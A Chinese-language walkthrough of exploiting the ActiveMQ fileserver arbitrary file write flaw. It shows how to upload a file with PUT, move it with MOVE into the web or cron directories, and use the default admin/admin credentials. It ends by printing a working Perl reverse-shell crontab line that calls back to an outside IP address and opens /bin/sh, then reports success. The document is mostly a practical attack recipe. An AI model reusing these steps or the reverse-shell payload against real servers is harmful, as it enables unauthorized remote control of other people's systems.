漏洞简介
ActiveMQ web控制台分为三个应用,admin、api和fileserver,其中admin为管理员页面,api为接口,fileserver为存放文件的接口;admin和api需要登录才可以使用,fileserver不需要登录。
fileserver 是一个 RESTful API 接口。我们可以通过GET、PUT、DELETE等HTTP请求来读写其中存储的文件。设计目的是为了弥补消息队列操作无法传输和存储二进制文件的缺陷,但后来发现:
它的使用率不高
文件操作容易出现漏洞
所以ActiveMQ在5.12.x~5.13.x中默认关闭了fileserver应用(可以在conf/jetty.xml中打开);在 5.14.0 之后,文件服务器应用程序被完全删除。
在测试过程中,要注意ActiveMQ的版本,防止无用功。
漏洞详情
这个漏洞出现在Fileserver应用中,漏洞原理其实很简单,就是fileserver支持写文件(但不解析JSP),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用移动请求将其移动到任何位置,从而导致任意文件写入漏洞。
写入cron或ssh key等文件
编写Webshell
写入cron或ssh key等文件
编写jar或jetty.xml等库和配置文件
写webshell的好处是方便,但是fileserver不解析jsp,admin和api都需要登录才能访问,有点白费力气;写cron或者ssh key的好处是直接反向Shell,也方便,坏处是需要root权限;写jar,有点麻烦(需要jar后门),写xml配置文件,这个方法比较靠谱,但是有一个徒劳的地方:我们需要知道ActiveMQ的绝对路径。
下面我们来谈谈上面的几种方法。
写入webshell
前面说过,Webshell需要写在Admin或者Api应用中,两个应用都需要登录才能访问。默认的 ActiveMQ 帐户和密码是admin.
首先访问systemProperties.jsp 查看ActiveMQ的绝对路径:
http://192.168.230.142:8161/admin/test/systemProperties.jsp
然后上传webshell
然后将其移动到/opt/activemq/webapps/api/bx.jspWeb 目录中的 API 文件夹
配置认证的请求头部
写crontab 计划任务 反弹shell 这样直接写入crontab是存在问题的,环境变量不会自动读取
在请求体中最后一字节进行回车换行(换行需从0d0a改成0a)
*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.200.29.90";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
成功获取shell